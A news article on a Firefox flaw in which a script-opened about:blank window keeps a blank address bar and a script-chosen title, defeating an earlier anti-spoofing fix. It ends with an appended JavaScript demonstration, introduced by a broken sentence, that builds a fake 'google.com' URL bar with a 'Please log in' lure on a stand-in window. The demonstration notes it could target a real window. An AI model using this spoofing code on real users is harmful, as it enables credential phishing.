Blank Firefox Windows Can Snag Unwary Users
Mere days after a cookie-manipulation weakness in Firefox was revealed, a researcher reported that a design flaw in the popular browser allows fraudulent Web sites to pass as legitimate. The bug also allows an attacker to bypass the fix for an old UI spoofing problem that had supposedly already been addressed.

The design flaw allows a script to open an "about:blank" URL in a new window or tab. The new window opens with a blank address bar, which appears grayed out or hidden. The script that opened it can then interact with the new document as if it were just another page under the original domain, including injecting custom HTML into it.

According to Michal Zalewski, the Polish security researcher who posted the flaw to BugTraq, some methods of adding HTML, such as win.document.write(), update document.location and the address bar to the URL of the page whose script is doing the writing. But because about:blank is a minimal yet valid HTML document, content can also be injected through win.document.body.appendChild() and friends. When that route is used, the address field remains blank, "reload" is disabled, and the "page info" and "page source" menu options reveal nothing useful. This works in the attacker's favor, Zalewski wrote, because a blank URL bar does not raise the flags that a fishy-sounding host name or URL scheme would.

The old UI spoofing bug concerned a window opened without a URL bar and menus. An attacker could use graphics, HTML controls, or XUL code so that the fake URL bar read "google.com" while an IFRAME below displayed "zombo.com." A malicious coder could likewise spoof a native, browser-originated modal warning or dialog to trick a user into taking a dangerous action. That flaw was fixed by forcing the current site name into the window title of every window that lacks a URL bar. That way the Internet origin of the popup is clear, limiting a bogus site's ability to imitate a native window.
Zalewski, who described the problem as relatively minor, said the trouble with that fix is that an "about:blank" window with no document.location defined lets the script control the window title, apart from the appended "Mozilla Firefox" string. Browser UI components can therefore be spoofed without raising user suspicion. Zalewski linked a "quick if naive" demonstration of both the design flaw and the workaround for the fix. Mozilla's security team is considering fixes for the problems.
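The two injection routes described above, and the title override that defeats the old fix, as an added example that is not code from Zalewski's post or from Mozilla. So that it runs outside a browser, it uses a small constructed stand-in for the popup window whose rules copy only the behaviour the article attributes to Firefox of that era: document.write() moves the document onto the opener's URL, while appendChild() leaves it at about:blank with a blank address bar and a script-settable title. The opener URL, host name and message are hypothetical; in a real browser you would pass the window returned by window.open('about:blank') in place of the stand-in.

```javascript
// Added example (not from Zalewski's post or Mozilla). The window stand-in
// below is constructed for this example; its rules follow the article:
//  - document.write() re-homes the document on the opener's URL, so
//    location (and the address bar) show the attacking page;
//  - appendChild() and friends leave location at about:blank, so the
//    address bar stays blank and the script may set the title itself.

const OPENER_URL = 'http://attacker.example/spoof.html'; // hypothetical

// Constructed stand-in for window.open('about:blank') from OPENER_URL.
function makeBlankWindow(openerUrl) {
  const body = {
    childNodes: [],
    appendChild(node) { this.childNodes.push(node); return node; },
  };
  const doc = {
    body,
    title: '',
    written: '',
    createElement(tag) {
      return { tag, attrs: {}, textContent: '',
               setAttribute(k, v) { this.attrs[k] = v; } };
    },
    // Modelled bug behaviour: write() changes the document's origin/URL.
    write(html) { this.written += html; win.location = openerUrl; },
    close() {},
  };
  const win = { location: 'about:blank', document: doc,
                opener: { location: openerUrl } };
  return win;
}

// Build a fake "chrome" lookalike: a pretend URL bar plus a message.
function buildChromeLookalike(doc, fakeHost, message) {
  const bar = doc.createElement('div');
  bar.setAttribute('id', 'fake-urlbar');
  bar.textContent = fakeHost;
  const text = doc.createElement('p');
  text.textContent = message;
  return [bar, text];
}

// Route 1 (the one the article says stays hidden): DOM insertion keeps the
// document at about:blank and lets the script choose the window title,
// which is what the old "site name in the title" fix relied on.
function injectViaDom(win, fakeHost, message) {
  const doc = win.document;
  for (const node of buildChromeLookalike(doc, fakeHost, message)) {
    doc.body.appendChild(node);
  }
  doc.title = fakeHost; // overrides the title-based origin indicator
  return { location: win.location, title: doc.title,
           injected: doc.body.childNodes.length };
}

// Route 2 (the one that gives itself away): document.write() updates
// location and the address bar to the writing script's own URL.
function injectViaWrite(win, fakeHost, message) {
  win.document.write('<div id="fake-urlbar">' + fakeHost + '</div><p>' +
                     message + '</p>');
  win.document.close();
  return { location: win.location, title: win.document.title };
}

// The check a wary user (or a browser-side indicator) would want: a window
// still at about:blank but carrying script-injected content belongs to
// whoever opened it, not to the host its fake chrome claims.
function describeOrigin(win) {
  if (win.location === 'about:blank' && win.document.body.childNodes.length > 0) {
    return 'content injected by opener ' + win.opener.location;
  }
  return win.location;
}

// Stand-alone run of both routes against the stand-in.
const domWin = makeBlankWindow(OPENER_URL);
console.log('appendChild route:', injectViaDom(domWin, 'google.com', 'Please log in'));
console.log('   real origin:', describeOrigin(domWin));
const writeWin = makeBlankWindow(OPENER_URL);
console.log('document.write route:', injectViaWrite(writeWin, 'google.com', 'Please log in'));
```

The stand-in is deliberately minimal; the point is the contrast between the two routes, not the DOM. Against a patched browser the appendChild route should report an origin in the address bar or title rather than the blank bar and attacker-chosen title shown here.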

